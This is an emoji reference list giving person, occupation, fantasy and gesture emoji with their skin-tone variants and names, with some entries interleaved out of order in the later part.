👨🏻🏭 Man Factory Worker: Light Skin Tone
👨🏼🏭 Man Factory Worker: Medium-Light Skin Tone
👨🏽🏭 Man Factory Worker: Medium Skin Tone
👨🏾🏭 Man Factory Worker: Medium-Dark Skin Tone
👨🏿🏭 Man Factory Worker: Dark Skin Tone
👩🏭 Woman Factory Worker
👩🏻🏭 Woman Factory Worker: Light Skin Tone
👩🏼🏭 Woman Factory Worker: Medium-Light Skin Tone
👩🏽🏭 Woman Factory Worker: Medium Skin Tone
👩🏾🏭 Woman Factory Worker: Medium-Dark Skin Tone
👩🏿🏭 Woman Factory Worker: Dark Skin Tone
👨💼 Man Office Worker
👨🏻💼 Man Office Worker: Light Skin Tone
👨🏼💼 Man Office Worker: Medium-Light Skin Tone
👨🏽💼 Man Office Worker: Medium Skin Tone
👨🏾💼 Man Office Worker: Medium-Dark Skin Tone
👨🏿💼 Man Office Worker: Dark Skin Tone
👩💼 Woman Office Worker
👩🏻💼 Woman Office Worker: Light Skin Tone
👩🏼💼 Woman Office Worker: Medium-Light Skin Tone
👩🏽💼 Woman Office Worker: Medium Skin Tone
👩🏾💼 Woman Office Worker: Medium-Dark Skin Tone
👩🏿💼 Woman Office Worker: Dark Skin Tone
👨🔬 Man Scientist
👨🏻🔬 Man Scientist: Light Skin Tone
👨🏼🔬 Man Scientist: Medium-Light Skin Tone
👨🏽🔬 Man Scientist: Medium Skin Tone
👨🏾🔬 Man Scientist: Medium-Dark Skin Tone
👨🏿🔬 Man Scientist: Dark Skin Tone
👩🔬 Woman Scientist
👩🏻🔬 Woman Scientist: Light Skin Tone
👩🏼🔬 Woman Scientist: Medium-Light Skin Tone
👩🏽🔬 Woman Scientist: Medium Skin Tone
👩🏾🔬 Woman Scientist: Medium-Dark Skin Tone
👩🏿🔬 Woman Scientist: Dark Skin Tone
👨💻 Man Technologist
👨🏻💻 Man Technologist: Light Skin Tone
👨🏼💻 Man Technologist: Medium-Light Skin Tone
👨🏽💻 Man Technologist: Medium Skin Tone
👨🏾💻 Man Technologist: Medium-Dark Skin Tone
👨🏿💻 Man Technologist: Dark Skin Tone
👩💻 Woman Technologist
👩🏻💻 Woman Technologist: Light Skin Tone
👩🏼💻 Woman Technologist: Medium-Light Skin Tone
👩🏽💻 Woman Technologist: Medium Skin Tone
👩🏾💻 Woman Technologist: Medium-Dark Skin Tone
👩🏿💻 Woman Technologist: Dark Skin Tone
👨🎤 Man Singer
👨🏻🎤 Man Singer: Light Skin Tone
👨🏼🎤 Man Singer: Medium-Light Skin Tone
👨🏽🎤 Man Singer: Medium Skin Tone
👨🏾🎤 Man Singer: Medium-Dark Skin Tone
👨🏿🎤 Man Singer: Dark Skin Tone
👩🎤 Woman Singer
👩🏻🎤 Woman Singer: Light Skin Tone
👩🏼🎤 Woman Singer: Medium-Light Skin Tone
👩🏽🎤 Woman Singer: Medium Skin Tone
👩🏾🎤 Woman Singer: Medium-Dark Skin Tone
👩🏿🎤 Woman Singer: Dark Skin Tone
👨🎨 Man Artist
👨🏻🎨 Man Artist: Light Skin Tone
👨🏼🎨 Man Artist: Medium-Light Skin Tone
👨🏽🎨 Man Artist: Medium Skin Tone
👨🏾🎨 Man Artist: Medium-Dark Skin Tone
👨🏿🎨 Man Artist: Dark Skin Tone
👩🎨 Woman Artist
👩🏻🎨 Woman Artist: Light Skin Tone
👩🏼🎨 Woman Artist: Medium-Light Skin Tone
👩🏽🎨 Woman Artist: Medium Skin Tone
👩🏾🎨 Woman Artist: Medium-Dark Skin Tone
👩🏿🎨 Woman Artist: Dark Skin Tone
👨✈️ Man Pilot
👨🏻✈️ Man Pilot: Light Skin Tone
👨🏼✈️ Man Pilot: Medium-Light Skin Tone
👨🏽✈️ Man Pilot: Medium Skin Tone
👨🏾✈️ Man Pilot: Medium-Dark Skin Tone
👨🏿✈️ Man Pilot: Dark Skin Tone
👩✈️ Woman Pilot
👩🏻✈️ Woman Pilot: Light Skin Tone
👩🏼✈️ Woman Pilot: Medium-Light Skin Tone
👩🏽✈️ Woman Pilot: Medium Skin Tone
👩🏾✈️ Woman Pilot: Medium-Dark Skin Tone
👩🏿✈️ Woman Pilot: Dark Skin Tone
👨🚀 Man Astronaut
👨🏻🚀 Man Astronaut: Light Skin Tone
👨🏼🚀 Man Astronaut: Medium-Light Skin Tone
👨🏽🚀 Man Astronaut: Medium Skin Tone
👨🏾🚀 Man Astronaut: Medium-Dark Skin Tone
👨🏿🚀 Man Astronaut: Dark Skin Tone
👩🚀 Woman Astronaut
👩🏻🚀 Woman Astronaut: Light Skin Tone
👩🏼🚀 Woman Astronaut: Medium-Light Skin Tone
👩🏽🚀 Woman Astronaut: Medium Skin Tone
👩🏾🚀 Woman Astronaut: Medium-Dark Skin Tone
👩🏿🚀 Woman Astronaut: Dark Skin Tone
👨🚒 Man Firefighter
👨🏻🚒 Man Firefighter: Light Skin Tone
👨🏼🚒 Man Firefighter: Medium-Light Skin Tone
👨🏽🚒 Man Firefighter: Medium Skin Tone
👨🏾🚒 Man Firefighter: Medium-Dark Skin Tone
👨🏿🚒 Man Firefighter: Dark Skin Tone
👩🚒 Woman Firefighter
👩🏻🚒 Woman Firefighter: Light Skin Tone
👩🏼🚒 Woman Firefighter: Medium-Light Skin Tone
👩🏽🚒 Woman Firefighter: Medium Skin Tone
👩🏾🚒 Woman Firefighter: Medium-Dark Skin Tone
👩🏿🚒 Woman Firefighter: Dark Skin Tone
👮 Police Officer
👮🏻 Police Officer: Light Skin Tone
👮🏼 Police Officer: Medium-Light Skin Tone
👮🏽 Police Officer: Medium Skin Tone
👮🏾 Police Officer: Medium-Dark Skin Tone
👮🏿 Police Officer: Dark Skin Tone
👮♂️ Man Police Officer
👮🏻♂️ Man Police Officer: Light Skin Tone
👮🏼♂️ Man Police Officer: Medium-Light Skin Tone
👮🏽♂️ Man Police Officer: Medium Skin Tone
👮🏾♂️ Man Police Officer: Medium-Dark Skin Tone
👮🏿♂️ Man Police Officer: Dark Skin Tone
👮♀️ Woman Police Officer
👮🏻♀️ Woman Police Officer: Light Skin Tone
👮🏼♀️ Woman Police Officer: Medium-Light Skin Tone
👮🏽♀️ Woman Police Officer: Medium Skin Tone
👮🏾♀️ Woman Police Officer: Medium-Dark Skin Tone
👮🏿♀️ Woman Police Officer: Dark Skin Tone
🕵 Detective
🕵🏻 Detective: Light Skin Tone
🕵🏼 Detective: Medium-Light Skin Tone
🕵🏽 Detective: Medium Skin Tone
🕵🏾 Detective: Medium-Dark Skin Tone
🕵🏿 Detective: Dark Skin Tone
🕵️♂️ Man Detective
🕵🏻♂️ Man Detective: Light Skin Tone
🕵🏼♂️ Man Detective: Medium-Light Skin Tone
🕵🏽♂️ Man Detective: Medium Skin Tone
🕵🏾♂️ Man Detective: Medium-Dark Skin Tone
🕵🏿♂️ Man Detective: Dark Skin Tone
🕵️♀️ Woman Detective
🕵🏻♀️ Woman Detective: Light Skin Tone
🕵🏼♀️ Woman Detective: Medium-Light Skin Tone
🕵🏽♀️ Woman Detective: Medium Skin Tone
🕵🏾♀️ Woman Detective: Medium-Dark Skin Tone
🕵🏿♀️ Woman Detective: Dark Skin Tone
💂 Guard
💂🏻 Guard: Light Skin Tone
💂🏼 Guard: Medium-Light Skin Tone
💂🏽 Guard: Medium Skin Tone
💂🏾 Guard: Medium-Dark Skin Tone
💂🏿 Guard: Dark Skin Tone
💂♂️ Man Guard
💂🏻♂️ Man Guard: Light Skin Tone
💂🏼♂️ Man Guard: Medium-Light Skin Tone
💂🏽♂️ Man Guard: Medium Skin Tone
💂🏾♂️ Man Guard: Medium-Dark Skin Tone
💂🏿♂️ Man Guard: Dark Skin Tone
💂♀️ Woman Guard
💂🏻♀️ Woman Guard: Light Skin Tone
💂🏼♀️ Woman Guard: Medium-Light Skin Tone
💂🏽♀️ Woman Guard: Medium Skin Tone
💂🏾♀️ Woman Guard: Medium-Dark Skin Tone
💂🏿♀️ Woman Guard: Dark Skin Tone
👷 Construction Worker
👷🏻 Construction Worker: Light Skin Tone
👷🏼 Construction Worker: Medium-Light Skin Tone
👷🏽 Construction Worker: Medium Skin Tone
👷🏾 Construction Worker: Medium-Dark Skin Tone
👷🏿 Construction Worker: Dark Skin Tone
👷♂️ Man Construction Worker
👷🏻♂️ Man Construction Worker: Light Skin Tone
👷🏼♂️ Man Construction Worker: Medium-Light Skin Tone
👷🏽♂️ Man Construction Worker: Medium Skin Tone
👷🏾♂️ Man Construction Worker: Medium-Dark Skin Tone
👷🏿♂️ Man Construction Worker: Dark Skin Tone
👷♀️ Woman Construction Worker
👷🏻♀️ Woman Construction Worker: Light Skin Tone
👷🏼♀️ Woman Construction Worker: Medium-Light Skin Tone
👷🏽♀️ Woman Construction Worker: Medium Skin Tone
👷🏾♀️ Woman Construction Worker: Medium-Dark Skin Tone
👷🏿♀️ Woman Construction Worker: Dark Skin Tone
🤴 Prince
🤴🏻 Prince: Light Skin Tone
🤴🏼 Prince: Medium-Light Skin Tone
🤴🏽 Prince: Medium Skin Tone
🤴🏾 Prince: Medium-Dark Skin Tone
🤴🏿 Prince: Dark Skin Tone
👸 Princess
👸🏻 Princess: Light Skin Tone
👸🏼 Princess: Medium-Light Skin Tone
👸🏽 Princess: Medium Skin Tone
👸🏾 Princess: Medium-Dark Skin Tone
👸🏿 Princess: Dark Skin Tone
👳 Person Wearing Turban
👳🏻 Person Wearing Turban: Light Skin Tone
👳🏼 Person Wearing Turban: Medium-Light Skin Tone
👳🏽 Person Wearing Turban: Medium Skin Tone
👳🏾 Person Wearing Turban: Medium-Dark Skin Tone
👳🏿 Person Wearing Turban: Dark Skin Tone
👳♂️ Man Wearing Turban
👳🏻♂️ Man Wearing Turban: Light Skin Tone
👳🏼♂️ Man Wearing Turban: Medium-Light Skin Tone
👳🏽♂️ Man Wearing Turban: Medium Skin Tone
👳🏾♂️ Man Wearing Turban: Medium-Dark Skin Tone
👳🏿♂️ Man Wearing Turban: Dark Skin Tone
👳♀️ Woman Wearing Turban
👳🏻♀️ Woman Wearing Turban: Light Skin Tone
👳🏼♀️ Woman Wearing Turban: Medium-Light Skin Tone
👳🏽♀️ Woman Wearing Turban: Medium Skin Tone
👳🏾♀️ Woman Wearing Turban: Medium-Dark Skin Tone
👳🏿♀️ Woman Wearing Turban: Dark Skin Tone
👲 Man With Chinese Cap
👲🏻 Man With Chinese Cap: Light Skin Tone
👲🏼 Man With Chinese Cap: Medium-Light Skin Tone
👲🏽 Man With Chinese Cap: Medium Skin Tone
👲🏾 Man With Chinese Cap: Medium-Dark Skin Tone
👲🏿 Man With Chinese Cap: Dark Skin Tone
🧕 Woman With Headscarf
🧕🏻 Person With Headscarf: Light Skin Tone
🧕🏼 Person With Headscarf: Medium-Light Skin Tone
🧕🏽 Person With Headscarf: Medium Skin Tone
🧕🏾 Person With Headscarf: Medium-Dark Skin Tone
🧕🏿 Person With Headscarf: Dark Skin Tone
🧔 Bearded Person
🧔🏻 Bearded Person: Light Skin Tone
🧔🏼 Bearded Person: Medium-Light Skin Tone
🧔🏽 Bearded Person: Medium Skin Tone
🧔🏾 Bearded Person: Medium-Dark Skin Tone
🧔🏿 Bearded Person: Dark Skin Tone
👱 Blond-Haired Person
👱🏻 Blond-Haired Person: Light Skin Tone
👱🏼 Blond-Haired Person: Medium-Light Skin Tone
👱🏽 Blond-Haired Person: Medium Skin Tone
👱🏾 Blond-Haired Person: Medium-Dark Skin Tone
👱🏿 Blond-Haired Person: Dark Skin Tone
👱♂️ Blond-Haired Man
👱🏻♂️ Blond-Haired Man: Light Skin Tone
👱🏼♂️ Blond-Haired Man: Medium-Light Skin Tone
👱🏽♂️ Blond-Haired Man: Medium Skin Tone
👱🏾♂️ Blond-Haired Man: Medium-Dark Skin Tone
👱🏿♂️ Blond-Haired Man: Dark Skin Tone
👱♀️ Blond-Haired Woman
👱🏻♀️ Blond-Haired Woman: Light Skin Tone
👱🏼♀️ Blond-Haired Woman: Medium-Light Skin Tone
👱🏽♀️ Blond-Haired Woman: Medium Skin Tone
👱🏾♀️ Blond-Haired Woman: Medium-Dark Skin Tone
👱🏿♀️ Blond-Haired Woman: Dark Skin Tone
🤵 Man in Tuxedo
🤵🏻 Man in Tuxedo: Light Skin Tone
🤵🏼 Man in Tuxedo: Medium-Light Skin Tone
🤵🏽 Man in Tuxedo: Medium Skin Tone
🤵🏾 Man in Tuxedo: Medium-Dark Skin Tone
🤵🏿 Man in Tuxedo: Dark Skin Tone
👰 Bride With Veil
👰🏻 Bride With Veil: Light Skin Tone
👰🏼 Bride With Veil: Medium-Light Skin Tone
👰🏽 Bride With Veil: Medium Skin Tone
👰🏾 Bride With Veil: Medium-Dark Skin Tone
👰🏿 Bride With Veil: Dark Skin Tone
🤰 Pregnant Woman
🤰🏻 Pregnant Woman: Light Skin Tone
🤰🏼 Pregnant Woman: Medium-Light Skin Tone
🤰🏽 Pregnant Woman: Medium Skin Tone
🤰🏾 Pregnant Woman: Medium-Dark Skin Tone
🤰🏿 Pregnant Woman: Dark Skin Tone
🤱 Breast-Feeding
🤱🏻 Breast-Feeding: Light Skin Tone
🤱🏼 Breast-Feeding: Medium-Light Skin Tone
🤱🏽 Breast-Feeding: Medium Skin Tone
🤱🏾 Breast-Feeding: Medium-Dark Skin Tone
🤱🏿 Breast-Feeding: Dark Skin Tone
👼 Baby Angel
👼🏻 Baby Angel: Light Skin Tone
👼🏼 Baby Angel: Medium-Light Skin Tone
👼🏽 Baby Angel: Medium Skin Tone
👼🏾 Baby Angel: Medium-Dark Skin Tone
👼🏿 Baby Angel: Dark Skin Tone
🎅 Santa Claus
🎅🏻 Santa Claus: Light Skin Tone
🎅🏼 Santa Claus: Medium-Light Skin Tone
🎅🏽 Santa Claus: Medium Skin Tone
🎅🏾 Santa Claus: Medium-Dark Skin Tone
🎅🏿 Santa Claus: Dark Skin Tone
🤶 Mrs. Claus
🤶🏻 Mrs. Claus: Light Skin Tone
🤶🏼 Mrs. Claus: Medium-Light Skin Tone
🤶🏽 Mrs. Claus: Medium Skin Tone
🤶🏾 Mrs. Claus: Medium-Dark Skin Tone
🤶🏿 Mrs. Claus: Dark Skin Tone
🧙 Mage
🧙🏻 Mage: Light Skin Tone
🧙🏼 Mage: Medium-Light Skin Tone
🧙🏽 Mage: Medium Skin Tone
🧙🏾 Mage: Medium-Dark Skin Tone
🧙🏿 Mage: Dark Skin Tone
🧙♀️ Woman Mage
🧙🏻♀️ Woman Mage: Light Skin Tone
🧙🏼♀️ Woman Mage: Medium-Light Skin Tone
🧙🏽♀️ Woman Mage: Medium Skin Tone
🧙🏾♀️ Woman Mage: Medium-Dark Skin Tone
🧙🏿♀️ Woman Mage: Dark Skin Tone
🧙♂️ Man Mage
🧙🏻♂️ Man Mage: Light Skin Tone
🧙🏼♂️ Man Mage: Medium-Light Skin Tone
🧙🏽♂️ Man Mage: Medium Skin Tone
🧙🏾♂️ Man Mage: Medium-Dark Skin Tone
🧙🏿♂️ Man Mage: Dark Skin Tone
🧚 Fairy
🧚🏻 Fairy: Light Skin Tone
🧚🏼 Fairy: Medium-Light Skin Tone
🧚🏽 Fairy: Medium Skin Tone
🧚🏾 Fairy: Medium-Dark Skin Tone
🧚🏿 Fairy: Dark Skin Tone
🧚♀️ Woman Fairy
🧚🏻♀️ Woman Fairy: Light Skin Tone
🧚🏼♀️ Woman Fairy: Medium-Light Skin Tone
🧚🏽♀️ Woman Fairy: Medium Skin Tone
🧚🏾♀️ Woman Fairy: Medium-Dark Skin Tone
🧚🏿♀️ Woman Fairy: Dark Skin Tone
🧚♂️ Man Fairy
🧚🏻♂️ Man Fairy: Light Skin Tone
🧚🏼♂️ Man Fairy: Medium-Light Skin Tone
🧚🏽♂️ Man Fairy: Medium Skin Tone
🧚🏾♂️ Man Fairy: Medium-Dark Skin Tone
🧚🏿♂️ Man Fairy: Dark Skin Tone
🧛 Vampire
🧛🏻 Vampire: Light Skin Tone
🧛🏼 Vampire: Medium-Light Skin Tone
🧛🏽 Vampire: Medium Skin Tone
🧛🏾 Vampire: Medium-Dark Skin Tone
🧛🏿 Vampire: Dark Skin Tone
🧛♀️ Woman Vampire
🧛🏻♀️ Woman Vampire: Light Skin Tone
🧛🏼♀️ Woman Vampire: Medium-Light Skin Tone
🧛🏽♀️ Woman Vampire: Medium Skin Tone
🧛🏾♀️ Woman Vampire: Medium-Dark Skin Tone
🧛🏿♀️ Woman Vampire: Dark Skin Tone
🧛♂️ Man Vampire
🧛🏻♂️ Man Vampire: Light Skin Tone
🧛🏼♂️ Man Vampire: Medium-Light Skin Tone
🧛🏽♂️ Man Vampire: Medium Skin Tone
🧛🏾♂️ Man Vampire: Medium-Dark Skin Tone
👯🏻 Woman With Bunny Ears, Type-1-2
👯🏼 Woman With Bunny Ears, Type-3
🧛🏿♂️ Man Vampire: Dark Skin Tone
👯🏽 Woman With Bunny Ears, Type-4
👯🏾 Woman With Bunny Ears, Type-5
🧜 Merperson
👯🏿 Woman With Bunny Ears, Type-6
🧜🏻 Merperson: Light Skin Tone
👯🏻♂️ Men With Bunny Ears Partying, Type-1-2
🧜🏼 Merperson: Medium-Light Skin Tone
👯🏼♂️ Men With Bunny Ears Partying, Type-3
🧜🏽 Merperson: Medium Skin Tone
👯🏽♂️ Men With Bunny Ears Partying, Type-4
🧜🏾 Merperson: Medium-Dark Skin Tone
👯🏾♂️ Men With Bunny Ears Partying, Type-5
🧜🏿 Merperson: Dark Skin Tone
👯🏿♂️ Men With Bunny Ears Partying, Type-6
🧜♀️ Mermaid
👯🏻♀️ Women With Bunny Ears Partying, Type-1-2
🧜🏻♀️ Mermaid: Light Skin Tone
👯🏼♀️ Women With Bunny Ears Partying, Type-3
🧜🏼♀️ Mermaid: Medium-Light Skin Tone
👯🏽♀️ Women With Bunny Ears Partying, Type-4
👯🏾♀️ Women With Bunny Ears Partying, Type-5
🧜🏽♀️ Mermaid: Medium Skin Tone
👯🏿♀️ Women With Bunny Ears Partying, Type-6
🧜🏾♀️ Mermaid: Medium-Dark Skin Tone
🧜🏿♀️ Mermaid: Dark Skin Tone
🧜♂️ Merman
🧜🏻♂️ Merman: Light Skin Tone
🧜🏼♂️ Merman: Medium-Light Skin Tone
👫🏻 Man and Woman Holding Hands, Type-1-2
🧜🏽♂️ Merman: Medium Skin Tone
👫🏼 Man and Woman Holding Hands, Type-3
👫🏽 Man and Woman Holding Hands, Type-4
🧜🏾♂️ Merman: Medium-Dark Skin Tone
👫🏾 Man and Woman Holding Hands, Type-5
👫🏿 Man and Woman Holding Hands, Type-6
🧜🏿♂️ Merman: Dark Skin Tone
👬🏻 Two Men Holding Hands, Type-1-2
🧝 Elf
👬🏼 Two Men Holding Hands, Type-3
👬🏽 Two Men Holding Hands, Type-4
🧝🏻 Elf: Light Skin Tone
👬🏾 Two Men Holding Hands, Type-5
🧝🏼 Elf: Medium-Light Skin Tone
👬🏿 Two Men Holding Hands, Type-6
🧝🏽 Elf: Medium Skin Tone
🧝🏾 Elf: Medium-Dark Skin Tone
👭🏻 Two Women Holding Hands, Type-1-2
🧝🏿 Elf: Dark Skin Tone
🧝♀️ Woman Elf
👭🏼 Two Women Holding Hands, Type-3
👭🏽 Two Women Holding Hands, Type-4
🧝🏻♀️ Woman Elf: Light Skin Tone
👭🏾 Two Women Holding Hands, Type-5
👭🏿 Two Women Holding Hands, Type-6
🧝🏼♀️ Woman Elf: Medium-Light Skin Tone
🧝🏽♀️ Woman Elf: Medium Skin Tone
🧝🏾♀️ Woman Elf: Medium-Dark Skin Tone
🧝🏿♀️ Woman Elf: Dark Skin Tone
🧝♂️ Man Elf
👪🏻 Family, Type-1-2
🧝🏻♂️ Man Elf: Light Skin Tone
👪🏼 Family, Type-3
👪🏽 Family, Type-4
🧝🏼♂️ Man Elf: Medium-Light Skin Tone
👪🏾 Family, Type-5
👪🏿 Family, Type-6
🧝🏽♂️ Man Elf: Medium Skin Tone
🧝🏾♂️ Man Elf: Medium-Dark Skin Tone
🧝🏿♂️ Man Elf: Dark Skin Tone
🧞 Genie
🧞♀️ Woman Genie
🧞♂️ Man Genie
🧟 Zombie
🧟♀️ Woman Zombie
🧟♂️ Man Zombie
🙍 Person Frowning
🙍🏻 Person Frowning: Light Skin Tone
🙍🏼 Person Frowning: Medium-Light Skin Tone
🙍🏽 Person Frowning: Medium Skin Tone
🙍🏾 Person Frowning: Medium-Dark Skin Tone
🙍🏿 Person Frowning: Dark Skin Tone
🙍♂️ Man Frowning
🙍🏻♂️ Man Frowning: Light Skin Tone
🏻 Light Skin Tone
🏼 Medium-Light Skin Tone
🙍🏼♂️ Man Frowning: Medium-Light Skin Tone
🏽 Medium Skin Tone
🙍🏽♂️ Man Frowning: Medium Skin Tone
🏾 Medium-Dark Skin Tone
🏿 Dark Skin Tone
🙍🏾♂️ Man Frowning: Medium-Dark Skin Tone
🙍🏿♂️ Man Frowning: Dark Skin Tone
🙍♀️ Woman Frowning
🙍🏻♀️ Woman Frowning: Light Skin Tone
🙍🏼♀️ Woman Frowning: Medium-Light Skin Tone
🙍🏽♀️ Woman Frowning: Medium Skin Tone
🙍🏾♀️ Woman Frowning: Medium-Dark Skin Tone
🙍🏿♀️ Woman Frowning: Dark Skin Tone
🙎 Person Pouting
🙎🏻 Person Pouting: Light Skin Tone
🙎🏼 Person Pouting: Medium-Light Skin Tone
🙎🏽 Person Pouting: Medium Skin Tone
🙎🏾 Person Pouting: Medium-Dark Skin Tone
🙎🏿 Person Pouting: Dark Skin Tone
🙎♂️ Man Pouting
🙎🏻♂️ Man Pouting: Light Skin Tone
🙎🏼♂️ Man Pouting: Medium-Light Skin Tone
🙎🏽♂️ Man Pouting: Medium Skin Tone
🙎🏾♂️ Man Pouting: Medium-Dark Skin Tone
🙎🏿♂️ Man Pouting: Dark Skin Tone
🙎♀️ Woman Pouting
🙎🏻♀️ Woman Pouting: Light Skin Tone
🙎🏼♀️ Woman Pouting: Medium-Light Skin Tone
🙎🏽♀️ Woman Pouting: Medium Skin Tone
🙎🏾♀️ Woman Pouting: Medium-Dark Skin Tone
🙎🏿♀️ Woman Pouting: Dark Skin Tone
🙅 Person Gesturing No
🙅🏻 Person Gesturing No: Light Skin Tone
🙅🏼 Person Gesturing No: Medium-Light Skin Tone
🙅🏽 Person Gesturing No: Medium Skin Tone
🙅🏾 Person Gesturing No: Medium-Dark Skin Tone
🙅🏿 Person Gesturing No: Dark Skin Tone
🙅♂️ Man Gesturing No
🙅🏻♂️ Man Gesturing No: Light Skin Tone
🙅🏼♂️ Man Gesturing No: Medium-Light Skin Tone
🙅🏽♂️ Man Gesturing No: Medium Skin Tone
🙅🏾♂️ Man Gesturing No: Medium-Dark Skin Tone
🙅🏿♂️ Man Gesturing No: Dark Skin Tone
🙅♀️ Woman Gesturing No
🙅🏻♀️ Woman Gesturing No: Light Skin Tone
🙅🏼♀️ Woman Gesturing No: Medium-Light Skin Tone
🙅🏽♀️ Woman Gesturing No: Medium Skin Tone
🙅🏾♀️ Woman Gesturing No: Medium-Dark Skin Tone
🙅🏿♀️ Woman Gesturing No: Dark Skin Tone
🙆 Person Gesturing OK
🙆🏻 Person Gesturing OK: Light Skin Tone
🙆🏼 Person Gesturing OK: Medium-Light Skin Tone
🙆🏽 Person Gesturing OK: Medium Skin Tone
🙆🏾 Person Gesturing OK: Medium-Dark Skin Tone
🙆🏿 Person Gesturing OK: Dark Skin Tone
🙆♂️ Man Gesturing OK
🙆🏻♂️ Man Gesturing OK: Light Skin Tone
🙆🏼♂️ Man Gesturing OK: Medium-Light Skin Tone
🙆🏽♂️ Man Gesturing OK: Medium Skin Tone
🙆🏾♂️ Man Gesturing OK: Medium-Dark Skin Tone
🙆🏿♂️ Man Gesturing OK: Dark Skin Tone
🙆♀️ Woman Gesturing OK
🙆🏻♀️ Woman Gesturing OK: Light Skin Tone
🙆🏼♀️ Woman Gesturing OK: Medium-Light Skin Tone
🙆🏽♀️ Woman Gesturing OK: Medium Skin Tone
🙆🏾♀️ Woman Gesturing OK: Medium-Dark Skin Tone
🙆🏿♀️ Woman Gesturing OK: Dark Skin Tone
💁 Person Tipping Hand
💁🏻 Person Tipping Hand: Light Skin Tone
💁🏼 Person Tipping Hand: Medium-Light Skin Tone
💁🏽 Person Tipping Hand: Medium Skin Tone
💁🏾 Person Tipping Hand: Medium-Dark Skin Tone
💁🏿 Person Tipping Hand: Dark Skin Tone
💁♂️ Man Tipping Hand
💁🏻♂️ Man Tipping Hand: Light Skin Tone
💁🏼♂️ Man Tipping Hand: Medium-Light Skin Tone
💁🏽♂️ Man Tipping Hand: Medium Skin Tone
💁🏾♂️ Man Tipping Hand: Medium-Dark Skin Tone
💁🏿♂️ Man Tipping Hand: Dark Skin Tone
💁♀️ Woman Tipping Hand
💁🏻♀️ Woman Tipping Hand: Light Skin Tone
💁🏼♀️ Woman Tipping Hand: Medium-Light Skin Tone
💁🏽♀️ Woman Tipping Hand: Medium Skin Tone
💁🏾♀️ Woman Tipping Hand: Medium-Dark Skin Tone
💁🏿♀️ Woman Tipping Hand: Dark Skin Tone
🙋 Person Raising Hand
🙋🏻 Person Raising Hand: Light Skin Tone
🙋🏼 Person Raising Hand: Medium-Light Skin Tone
🙋🏽 Person Raising Hand: Medium Skin Tone
🙋🏾 Person Raising Hand: Medium-Dark Skin Tone
🙋🏿 Person Raising Hand: Dark Skin Tone
🙋♂️ Man Raising Hand
🙋🏻♂️ Man Raising Hand: Light Skin Tone
🙋🏼♂️ Man Raising Hand: Medium-Light Skin Tone
🙋🏽♂️ Man Raising Hand: Medium Skin Tone
🙋🏾♂️ Man Raising Hand: Medium-Dark Skin Tone
🙋🏿♂️ Man Raising Hand: Dark Skin Tone
🙋♀️ Woman Raising Hand
🙋🏻♀️ Woman Raising Hand: Light Skin Tone
🙋🏼♀️ Woman Raising Hand: Medium-Light Skin Tone
🙋🏽♀️ Woman Raising Hand: Medium Skin Tone
🙋🏾♀️ Woman Raising Hand: Medium-Dark Skin Tone
🙋🏿♀️ Woman Raising Hand: Dark Skin Tone
🙇 Person Bowing
🙇🏻 Person Bowing: Light Skin Tone
🙇🏼 Person Bowing: Medium-Light Skin Tone
🙇🏽 Person Bowing: Medium Skin Tone
🙇🏾 Person Bowing: Medium-Dark Skin Tone
🙇🏿 Person Bowing: Dark Skin Tone
🙇♂️ Man Bowing
🙇🏻♂️ Man Bowing: Light Skin Tone
🤝🏻 Handshake, Type-1-2
🙇🏼♂️ Man Bowing: Medium-Light Skin Tone
🤝🏼 Handshake, Type-3
🤝🏽 Handshake, Type-4
🙇🏽♂️ Man Bowing: Medium Skin Tone
🤝🏾 Handshake, Type-5
🤝🏿 Handshake, Type-6
🙇🏾♂️ Man Bowing: Medium-Dark Skin Tone
🙇🏿♂️ Man Bowing: Dark Skin Tone
🙇♀️ Woman Bowing
🙇🏻♀️ Woman Bowing: Light Skin Tone
🙇🏼♀️ Woman Bowing: Medium-Light Skin Tone
🙇🏽♀️ Woman Bowing: Medium Skin Tone
🙇🏾♀️ Woman Bowing: Medium-Dark Skin Tone
🙇🏿♀️ Woman Bowing: Dark Skin Tone
🤦 Person Facepalming
🤦🏻 Person Facepalming: Light Skin Tone
🤦🏼 Person Facepalming: Medium-Light Skin Tone
🤦🏽 Person Facepalming: Medium Skin Tone
🤦🏾 Person Facepalming: Medium-Dark Skin Tone
🤦🏿 Person Facepalming: Dark Skin Tone
🤦♂️ Man Facepalming
🤦🏻♂️ Man Facepalming: Light Skin Tone
🤦🏼♂️ Man Facepalming: Medium-Light Skin Tone
🤦🏽♂️ Man Facepalming: Medium Skin Tone
🤦🏾♂️ Man Facepalming: Medium-Dark Skin Tone
🤦🏿♂️ Man Facepalming: Dark Skin Tone
🤦♀️ Woman Facepalming
🤦🏻♀️ Woman Facepalming: Light Skin Tone
🤦🏼♀️ Woman Facepalming: Medium-Light Skin Tone
🤦🏽♀️ Woman Facepalming: Medium Skin Tone
🤦🏾♀️ Woman Facepalming: Medium-Dark Skin Tone
🤦🏿♀️ Woman Facepalming: Dark Skin Tone
🤷 Person Shrugging
🤷🏻 Person Shrugging: Light Skin Tone
🤷🏼 Person Shrugging: Medium-Light Skin Tone
🤷🏽 Person Shrugging: Medium Skin Tone
🤷🏾 Person Shrugging: Medium-Dark Skin Tone
🤷🏿 Person Shrugging: Dark Skin Tone
🤷♂️ Man Shrugging
🤷🏻♂️ Man Shrugging: Light Skin Tone
🤷🏼♂️ Man Shrugging: Medium-Light Skin Tone
🤷🏽♂️ Man Shrugging: Medium Skin Tone
🤷🏾♂️ Man Shrugging: Medium-Dark Skin Tone
🤷🏿♂️ Man Shrugging: Dark Skin Tone
🤷♀️ Woman Shrugging
🤷🏻♀️ Woman Shrugging: Light Skin Tone
🤷🏼♀️ Woman Shrugging: Medium-Light Skin Tone
🤷🏽♀️ Woman Shrugging: Medium Skin Tone
🤷🏾♀️ Woman Shrugging: Medium-Dark Skin Tone
🤷🏿♀️ Woman Shrugging: Dark Skin Tone
💆 Person Getting Massage
💆🏻 Person Getting Massage: Light Skin Tone
💆🏼 Person Getting Massage: Medium-Light Skin Tone
💆🏽 Person Getting Massage: Medium Skin Tone
💆🏾 Person Getting Massage: Medium-Dark Skin Tone
💆🏿 Person Getting Massage: Dark Skin Tone
💆♂️ Man Getting Massage
💆🏻♂️ Man Getting Massage: Light Skin Tone
💆🏼♂️ Man Getting Massage: Medium-Light Skin Tone
💆🏽♂️ Man Getting Massage: Medium Skin Tone
💆🏾♂️ Man Getting Massage: Medium-Dark Skin Tone
💆🏿♂️ Man Getting Massage: Dark Skin Tone
💆♀️ Woman Getting Massage
💆🏻♀️ Woman Getting Massage: Light Skin Tone
💆🏼♀️ Woman Getting Massage: Medium-Light Skin Tone
💆🏽♀️ Woman Getting Massage: Medium Skin Tone
